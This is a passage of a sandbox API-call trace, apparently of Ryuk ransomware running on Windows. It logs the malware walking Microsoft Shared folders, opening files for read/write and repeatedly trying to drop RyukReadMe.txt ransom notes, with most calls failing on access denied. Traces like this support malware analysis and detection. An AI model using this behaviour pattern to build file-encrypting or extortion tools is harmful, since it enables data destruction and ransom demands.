(hObject=0xffffffffffffffff) returned 0 [0133.292] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.292] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.292] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.292] SetLastError (dwErrCode=0x0) [0133.292] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.292] GetLastError () returned 0x5 [0133.292] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.292] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.292] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.292] SetLastError (dwErrCode=0x0) [0133.293] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.293] GetLastError () returned 0x5 [0133.293] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.293] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.293] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.293] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.293] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.293] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.294] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS", dwFileAttributes=0x80) returned 0 [0133.294] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enes\\msb1enes.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.294] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.294] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.294] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.294] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.294] SetLastError (dwErrCode=0x0) [0133.294] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enes\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.294] GetLastError () returned 0x5 [0133.294] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.294] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.294] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.294] SetLastError (dwErrCode=0x0) [0133.294] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.294] GetLastError () returned 0x5 [0133.295] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.295] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.295] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.295] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.295] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.295] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.295] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS", dwFileAttributes=0x80) returned 0 [0133.295] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enfr\\msb1enfr.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.295] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.295] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.295] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.295] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.295] SetLastError (dwErrCode=0x0) [0133.295] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enfr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.296] GetLastError () returned 0x5 [0133.296] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.296] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.296] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.296] SetLastError (dwErrCode=0x0) [0133.296] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.296] GetLastError () returned 0x5 [0133.296] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.296] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.296] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.296] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.296] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.296] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.296] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.296] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS", dwFileAttributes=0x80) returned 0 [0133.296] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.297] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.297] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.297] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.297] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.297] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX", dwFileAttributes=0x80) returned 0 [0133.297] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\wt61es.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.297] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.297] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.297] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.297] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.297] SetLastError (dwErrCode=0x0) [0133.297] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.298] GetLastError () returned 0x5 [0133.298] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.298] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.298] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.298] SetLastError (dwErrCode=0x0) [0133.298] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.298] GetLastError () returned 0x5 [0133.298] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.298] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.298] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.299] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.299] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.299] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.299] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS", dwFileAttributes=0x80) returned 0 [0133.299] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\frar\\msb1frar.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.299] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.299] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.299] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.299] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.299] SetLastError (dwErrCode=0x0) [0133.299] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\frar\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.300] GetLastError () returned 0x5 [0133.300] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.300] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.300] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.300] SetLastError (dwErrCode=0x0) [0133.300] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.300] GetLastError () returned 0x5 [0133.300] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.300] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.300] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.301] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.301] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.301] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.301] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.301] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS", dwFileAttributes=0x80) returned 0 [0133.301] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.301] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.301] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.301] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.301] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.302] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX", dwFileAttributes=0x80) returned 0 [0133.302] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\wt61fr.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.302] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.302] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.303] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.303] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.303] SetLastError (dwErrCode=0x0) [0133.303] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.303] GetLastError () returned 0x5 [0133.303] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.303] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.303] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.303] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.303] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX", dwFileAttributes=0x80) returned 0 [0133.303] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.303] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.303] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.304] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.304] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.304] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX", dwFileAttributes=0x80) returned 0 [0133.304] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1cach.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.304] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.304] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.304] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.304] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.304] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.304] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.304] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0133.304] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0133.304] SetLastError (dwErrCode=0x0) [0133.304] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.304] GetLastError () returned 0x5 [0133.305] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.305] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.305] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.305] SetLastError (dwErrCode=0x0) [0133.305] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.305] GetLastError () returned 0x5 [0133.305] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.305] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.305] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0133.305] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.305] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.305] SetLastError (dwErrCode=0x0) [0133.305] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.305] GetLastError () returned 0x5 [0133.305] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.305] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.305] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.306] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.306] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.306] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.306] SetLastError (dwErrCode=0x0) [0133.306] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.306] GetLastError () returned 0x5 [0133.306] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.307] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.307] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0133.307] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0133.307] SetLastError (dwErrCode=0x0) [0133.307] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.307] GetLastError () returned 0x5 [0133.307] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.307] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.307] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.307] SetLastError (dwErrCode=0x0) [0133.307] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, 